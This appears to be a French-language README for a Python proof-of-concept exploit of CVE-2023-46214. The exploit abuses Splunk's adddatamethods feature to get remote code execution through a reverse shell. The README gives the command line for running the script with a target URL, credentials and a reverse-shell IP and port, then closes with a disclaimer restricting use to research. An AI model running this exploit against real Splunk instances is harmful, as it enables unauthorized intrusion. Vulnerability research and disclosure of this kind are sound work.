
PoC basé sur Python pour CVE-2023-46214 qui exploite la fonctionnalité adddatamethods de Splunk pour réaliser une exécution de code à distance via un reverse shell.
Exploit de preuve de concept pour CVE-2023-46214, SVD-2023-1104

L'URL de l'instance Splunk, le nom d'utilisateur, le mot de passe, l'adresse IP du reverse shell et le port sont tous requis comme paramètres de ligne de commande. Par exemple :
$ python3 CVE-2023-46214.py --url <Splunk_URL> --username <Username> --password <Password> --ip <Reverse_Shell_IP> --port <Reverse_Shell_Port>
J'ai rédigé un article de blog détaillant la méthodologie utilisée pour découvrir cette vulnérabilité. Si vous rencontrez des problèmes avec le script, cet article peut être utile car il détaille les étapes manuelles d'exploitation.
Analyse de la CVE-2023-46214 + PoC
Le script de preuve de concept (PoC) fourni dans ce dépôt sert uniquement à des fins éducatives et de recherche. Son but est de démontrer une vulnérabilité spécifique et d'aider à comprendre les risques de sécurité associés.
Toute utilisation de ce script pour des activités non autorisées, y compris mais sans s'y limiter, l'accès non autorisé à des systèmes, les tests non autorisés ou toute autre forme d'utilisation abusive, est formellement interdite.
Les créateurs et contributeurs de ce dépôt déclinent toute responsabilité en cas d'utilisation inappropriée ou de tout dommage ou préjudice résultant de l'utilisation de ce script. En utilisant ce script, vous consentez à l'utiliser de manière responsable et à vos propres risques.